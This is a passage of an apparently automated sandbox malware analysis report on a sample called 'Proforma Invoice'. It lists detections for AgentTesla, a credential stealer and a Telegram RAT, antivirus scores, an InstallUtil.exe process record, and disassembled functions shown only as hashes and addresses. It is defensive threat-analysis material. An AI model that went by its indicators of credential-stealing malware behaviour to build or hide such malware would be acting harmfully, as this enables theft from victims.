                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2753904041.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 61%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:06:14:53
                                                                                        Start date:31/10/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                        Imagebase:0x5d0000
                                                                                        File size:42'064 bytes
                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3529968351.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3529968351.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3529968351.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3529968351.00000000028C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.3529968351.00000000028C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Executed Functions

                                                                                          Function 008ECEA0 Relevance: 2.2, Strings: 1, Instructions: 983COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Ehq"
                                                                                          • API String ID: 0-672064728
                                                                                          • Opcode ID: 489346e3ee85fa36069cdbd76a95165ff0eba43cfd5266def64b6a49b5f9c79b
                                                                                          • Instruction ID: 63fbc4bf4084479791fdc008b391dfb8319c5cdb7443d565c6cecacc216ba78e
                                                                                          • Opcode Fuzzy Hash: 489346e3ee85fa36069cdbd76a95165ff0eba43cfd5266def64b6a49b5f9c79b
                                                                                          • Instruction Fuzzy Hash: 79A2C475A00228CFDB64CF69C884AD9BBB2FF89304F1581E9D509AB365DB319E85CF40
                                                                                          Function 008EE630 Relevance: .7, Instructions: 651COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3a0d1328c95ee3cf3553785b13b50b8b64e6568ec889564eb74d6ec06e96727a
                                                                                          • Instruction ID: a691e8d7f4ad594b2b9e562c1689f437220f33c1d1dd08a3ddc9ef0acf0f792d
                                                                                          • Opcode Fuzzy Hash: 3a0d1328c95ee3cf3553785b13b50b8b64e6568ec889564eb74d6ec06e96727a
                                                                                          • Instruction Fuzzy Hash: FA423D34B00249CFDB14DF6AC894A6A7BF6FF9A310B2584A9D506CB3A5DB31DC41CB51
                                                                                          Function 05A02A88 Relevance: .3, Instructions: 311COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 621d253f031f837131ed7285940e0a63dd9ec3f4b9d81df055fab018293efad2
                                                                                          • Instruction ID: 6fd4f94031b75e2f92d0e8727e153438003cdd4b56de26a6c56e884e87fd94af
                                                                                          • Opcode Fuzzy Hash: 621d253f031f837131ed7285940e0a63dd9ec3f4b9d81df055fab018293efad2
                                                                                          • Instruction Fuzzy Hash: C7E1F674E15618CFDB54DF69E888B9DBBB2FF89300F1090A9D049A7295DB345E8ACF10
                                                                                          Function 05A008A0 Relevance: .2, Instructions: 198COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8f13c584f718f31663d6ff1a6edfa2c09881802d36e214c6aade82309739b077
                                                                                          • Instruction ID: 987e2bdf3191ec5751a2decad640b512707599a008810727aca31889ae5af8dd
                                                                                          • Opcode Fuzzy Hash: 8f13c584f718f31663d6ff1a6edfa2c09881802d36e214c6aade82309739b077
                                                                                          • Instruction Fuzzy Hash: 1581D470D15608CFDB54DFA9E448BADBBF2FF89304F50A02AD019A72A5DB34598ACF40
                                                                                          Function 06DC79B4 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2
                                                                                          • API String ID: 0-450215437
                                                                                          • Opcode ID: cae04218c17588b6455b96bb11fb5b05f52d7ef537b4b48b148224f8593fe74b
                                                                                          • Instruction ID: 4a2fc187b42d3088ce66b431f1b8ed0cc0905a74b0a810ca1a7a2755c814f60a
                                                                                          • Opcode Fuzzy Hash: cae04218c17588b6455b96bb11fb5b05f52d7ef537b4b48b148224f8593fe74b
                                                                                          • Instruction Fuzzy Hash: D301DF70905129CFEBA29F18D889B9EB7B0FF85310F0040E6C4189B606CB318EC4DF92
                                                                                          Function 008EEEC0 Relevance: .4, Instructions: 355COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b96506df5c831dd3d0b02254ecee58e8022fe62008538d7615b2ff7d0ac2c18f
                                                                                          • Instruction ID: ffaa8b3b85f63860876cd072b10d3673e206eeb9a11d5207372bd0aa79184b4d
                                                                                          • Opcode Fuzzy Hash: b96506df5c831dd3d0b02254ecee58e8022fe62008538d7615b2ff7d0ac2c18f
                                                                                          • Instruction Fuzzy Hash: 75C1F0323046558FDB159F69E850AAE7BA6FFCA310F14847AE905CB392DB34DC06C7A1
                                                                                          Function 008EF790 Relevance: .2, Instructions: 208COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 663acab1d3fe54f57449945bb60d35ac75fd47e83db8125a964514e8c6108fad
                                                                                          • Instruction ID: dfc9e1f201077eacab27aef09336372b754ce794dfc99c44836653db7af7cc62
                                                                                          • Opcode Fuzzy Hash: 663acab1d3fe54f57449945bb60d35ac75fd47e83db8125a964514e8c6108fad
                                                                                          • Instruction Fuzzy Hash: EC81E535A00658DFCB14EF69C484A9EBBF5FF89310B158169E946DB362DB30ED42CB90
                                                                                          Function 008E0928 Relevance: .2, Instructions: 195COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 80ec9248fac95c1efacbad86c658225c2ef24f3b66b0acd8a00faf8cdd716180
                                                                                          • Instruction ID: b79f9fe293deef254d6a96b83778a9114e8936039dacfae62d6ca15b398eb2c3
                                                                                          • Opcode Fuzzy Hash: 80ec9248fac95c1efacbad86c658225c2ef24f3b66b0acd8a00faf8cdd716180
                                                                                          • Instruction Fuzzy Hash: 20714B34B001588FC708DB69D494A6DBBF2FF89711F2584A9E506EB361CB71AC45CF91
                                                                                          Function 008E8F60 Relevance: .1, Instructions: 127COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5d7a247177ec03f5ab640acee83cd98d965db75be3c4558ad7569a0da054f7f5
                                                                                          • Instruction ID: f85e7d7a10f0e49fbd68a102c80459b0ab6130a005471d7cf8cac1498503a796
                                                                                          • Opcode Fuzzy Hash: 5d7a247177ec03f5ab640acee83cd98d965db75be3c4558ad7569a0da054f7f5
                                                                                          • Instruction Fuzzy Hash: 6B41B7718092989FD702EF68D8A569ABFB0EF07304F1484DAD084DB252DB784A49CB66
                                                                                          Function 05A01C50 Relevance: .1, Instructions: 126COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 91c69ee7bdf0f16d8da51fee8221c5b6cfdf088490e075253818ad49c7f95ddd
                                                                                          • Instruction ID: 0e2e677a9c3a83ca2a9a913c8967191acf1fad719edf6b08265b5ba8ff646700
                                                                                          • Opcode Fuzzy Hash: 91c69ee7bdf0f16d8da51fee8221c5b6cfdf088490e075253818ad49c7f95ddd
                                                                                          • Instruction Fuzzy Hash: 83411F70D14248CFDB04DF9AE844BEDBBF6FB8A314F10A02AD519A7295DB74894ACF04
                                                                                          Function 008E0918 Relevance: .1, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d9ffcab2cc3ef70de4b9a47865a15cc4106c2a521a23defeddc7cc3a6cf902bc
                                                                                          • Instruction ID: 04fa6c4e3eb34029e29c2e65ba7c6fe34049a4138f452f2d691c350a99233bf9
                                                                                          • Opcode Fuzzy Hash: d9ffcab2cc3ef70de4b9a47865a15cc4106c2a521a23defeddc7cc3a6cf902bc
                                                                                          • Instruction Fuzzy Hash: 3F416C34B002589FC744DFA9D498AAD7BF2FF89310F258469E906EB3A1CE719C45CB51
                                                                                          Function 008E099D Relevance: .1, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: de8bb320c1fc4ea4a22a07b03147b0cb8b2fca90b7b8ca34c0af30244c639485
                                                                                          • Instruction ID: d99b2c49b30fbb8eba3a1f2144991bdedc97bfa40f86a6c148e98303e5dfd91c
                                                                                          • Opcode Fuzzy Hash: de8bb320c1fc4ea4a22a07b03147b0cb8b2fca90b7b8ca34c0af30244c639485
                                                                                          • Instruction Fuzzy Hash: 3B41E734B001148FC744EFA9D498A6DBBF2FF89711B258469E906EB3A1CE719C45CF51
                                                                                          Function 008E13FC Relevance: .1, Instructions: 88COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0c4bf54464e67a86e960886f04b5dba9d7e647f9828f5e7ef25f40cf2b44dcf5
                                                                                          • Instruction ID: 0562962fa35b38ba2200912b6c60b398d53dc5cb66dc8b6c5ea269d10358aa24
                                                                                          • Opcode Fuzzy Hash: 0c4bf54464e67a86e960886f04b5dba9d7e647f9828f5e7ef25f40cf2b44dcf5
                                                                                          • Instruction Fuzzy Hash: BC3114B0D012899FDB10CFAAC594ADEBFF5BF49740F248069E909AB350DB359D45CBA0
                                                                                          Function 008E1408 Relevance: .1, Instructions: 83COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 235eb5646793d3ae1506ad390d16c950bccd568a7565bc3169822e7f6110be91
                                                                                          • Instruction ID: 64b4cb75750e909acf662621458c7b5fce848148084788ffd0d6d4b8f6013953
                                                                                          • Opcode Fuzzy Hash: 235eb5646793d3ae1506ad390d16c950bccd568a7565bc3169822e7f6110be91
                                                                                          • Instruction Fuzzy Hash: CB3136B0D002899FDF10CFAAC484ADEBBF5BF48740F248029E509AB350DB349940CB90
                                                                                          Function 0083D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453359666.000000000083D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_83d000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3244cc1782b44ca7122c4a0b08eb939ec29cbcfba51251c2b56ca6e38f40fc4f
                                                                                          • Instruction ID: 34917dfce1992d757b45129f8288942520c02da4073147cf39b14aca3f357599
                                                                                          • Opcode Fuzzy Hash: 3244cc1782b44ca7122c4a0b08eb939ec29cbcfba51251c2b56ca6e38f40fc4f
                                                                                          • Instruction Fuzzy Hash: FD21F572604344EFDB15DF14E9C0B26BF65FBC8318F24C569E9098B256C336D856CAE2
                                                                                          Function 0084D030 Relevance: .1, Instructions: 74COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453394339.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_84d000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5f75ca01aacd8cd060b9aec934495f5456393fa9b42caa5bb11aa67f9298eaee
                                                                                          • Instruction ID: 56ea240e7649f52bf7b0d69c54ac26609429192a534bd45882358ba4d75de73a
                                                                                          • Opcode Fuzzy Hash: 5f75ca01aacd8cd060b9aec934495f5456393fa9b42caa5bb11aa67f9298eaee
                                                                                          • Instruction Fuzzy Hash: 92210771604748DFDB15DF14D9C4B26BFA5FB84314F24C569ED098B246C33AD806CBA2
                                                                                          Function 05A02740 Relevance: .1, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f6a4bddc9ae5bf0cf8309a74481bc0fe93bde8531cd145a62f103af948b02245
                                                                                          • Instruction ID: 1f2d54100e217fd0d855ca1897d11a1f3fcd9e8c64c40be36c8c44e844ce06aa
                                                                                          • Opcode Fuzzy Hash: f6a4bddc9ae5bf0cf8309a74481bc0fe93bde8531cd145a62f103af948b02245
                                                                                          • Instruction Fuzzy Hash: 35215978E14209DFDB04DFA9E848BBEBBB6FF89300F109025D415A3295DB385A09CF91
                                                                                          Function 008E8FC8 Relevance: .1, Instructions: 64COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5a4b3dfd9ffbd43a85e30634bab8986172ae8bf414340e0f96f74537ca60ddec
                                                                                          • Instruction ID: 0eb300350a2aa2a2c0442c0ddf19f08e0fedf8ea02a079eb8f65a74d9aa5760f
                                                                                          • Opcode Fuzzy Hash: 5a4b3dfd9ffbd43a85e30634bab8986172ae8bf414340e0f96f74537ca60ddec
                                                                                          • Instruction Fuzzy Hash: 382188B0908648DFE740EFAAD4497ADBBF5FB4A304F6084A9D009E3251DBB44A88DF05
                                                                                          Function 008EE0D0 Relevance: .1, Instructions: 58COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6ae1f7be6fd0112b7e483bea41b9b4faa6c7890b1252ffce5e9eece34581536d
                                                                                          • Instruction ID: b43b575a6ca22cb92fdc0c2096ecf985fa368e3d06537c811b4a4f7b995629cf
                                                                                          • Opcode Fuzzy Hash: 6ae1f7be6fd0112b7e483bea41b9b4faa6c7890b1252ffce5e9eece34581536d
                                                                                          • Instruction Fuzzy Hash: CA1123B5D0425DCBDF04CF9AD8856EEBBF6FB8A315F10802AD504B3210D7745A85CBA0
                                                                                          Function 0083D4BF Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453359666.000000000083D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_83d000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                          • Instruction ID: 54f4d6c3c5c4ae6df5286174a312bca9eb26a0dcf368550830a57296b1e4fda8
                                                                                          • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                          • Instruction Fuzzy Hash: DE11D376504380DFCB16CF10D5C4B16BF71FB94314F24C6A9D8494B656C33AD85ACBA2
                                                                                          Function 06DC2AFE Relevance: .1, Instructions: 55COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 25df62792553cf2aafaf2ddbfc66e06559eff30918ba84184bba3062f76209d1
                                                                                          • Instruction ID: 4bdb52b4427e0ce23c74c112a77d10960106b202717e09a1c137f7dc3b635bd9
                                                                                          • Opcode Fuzzy Hash: 25df62792553cf2aafaf2ddbfc66e06559eff30918ba84184bba3062f76209d1
                                                                                          • Instruction Fuzzy Hash: 3B21E478A00229CFDB65DF28D998AD9B7B1FB48304F1181E9D918E7345DB749EC58F40
                                                                                          Function 0084D02B Relevance: .1, Instructions: 55COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453394339.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_84d000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6378273382ad61b692e8e45ce1cce0bbd419bee2ae48a67450022ee3627af51c
                                                                                          • Instruction ID: dec6fc89c3064de98c28dcd7425f221bb6fe490ab1778dad1e1f97c571d4e960
                                                                                          • Opcode Fuzzy Hash: 6378273382ad61b692e8e45ce1cce0bbd419bee2ae48a67450022ee3627af51c
                                                                                          • Instruction Fuzzy Hash: 60118E76504684DFCB16DF14D9C4B16FF62FB84314F24C6AAD8094B656C33AD81ACBA2
                                                                                          Function 06DDA478 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ab0604dfce443e8571c86f8a6b953497c98dbc6d29880c2bcaa55761e11f183b
                                                                                          • Instruction ID: 0cae014afea50149e41bd3d2d4f2fc9a01f4db1f0a8997f78a32b39cd0bc2213
                                                                                          • Opcode Fuzzy Hash: ab0604dfce443e8571c86f8a6b953497c98dbc6d29880c2bcaa55761e11f183b
                                                                                          • Instruction Fuzzy Hash: 25119FB4E01209DFCB44EFA8D549AAEBBF1FB48300F1485AAD819E7351DB349A41CF91
                                                                                          Function 06DDF4E0 Relevance: .0, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ffb4aec52d7d75b1aff0638f974b62470853eb3b8f2889787104ea1f526e4854
                                                                                          • Instruction ID: ba3b937ccaa53d5cbfbd3a5e9b86cf795a2fbc3f305d0c815b341283f3378b03
                                                                                          • Opcode Fuzzy Hash: ffb4aec52d7d75b1aff0638f974b62470853eb3b8f2889787104ea1f526e4854
                                                                                          • Instruction Fuzzy Hash: F811F3B0E002099FDB44DFA9C9517BEBBF5FF89300F20846A9518E7355DA309A418B91
                                                                                          Function 0083D76D Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453359666.000000000083D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_83d000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6c1d7ef2d979373ce256a987941379457c65f83dbc039d74cf69a3cdc8235121
                                                                                          • Instruction ID: 411b372637f587a8c152fbc331ae658f1c0212739e2239b9a01ba0fbaac58207
                                                                                          • Opcode Fuzzy Hash: 6c1d7ef2d979373ce256a987941379457c65f83dbc039d74cf69a3cdc8235121
                                                                                          • Instruction Fuzzy Hash: 5501D631005348EAE7104B25ED84B66FFD8FFD2764F18C41AED098A286C7799C44CAF2
                                                                                          Function 008E0898 Relevance: .0, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bffc6328791e1c619420e3b655fa88dc02ecb9c7802dfd70d86b63870a3206dd
                                                                                          • Instruction ID: e7f2e104224ac5e0d81506d0988d8ab9813b05c25fbc14f2f261046b6cba71e8
                                                                                          • Opcode Fuzzy Hash: bffc6328791e1c619420e3b655fa88dc02ecb9c7802dfd70d86b63870a3206dd
                                                                                          • Instruction Fuzzy Hash: 79F0FF226047984BC303A73DE82096A3FEAFEC36A0305457ED580CB356EE249D0987D2
                                                                                          Function 008E0B4B Relevance: .0, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe46aa6e4d071e142a3c72e012e7c125965d8611e5421247a6e88d713ece8668
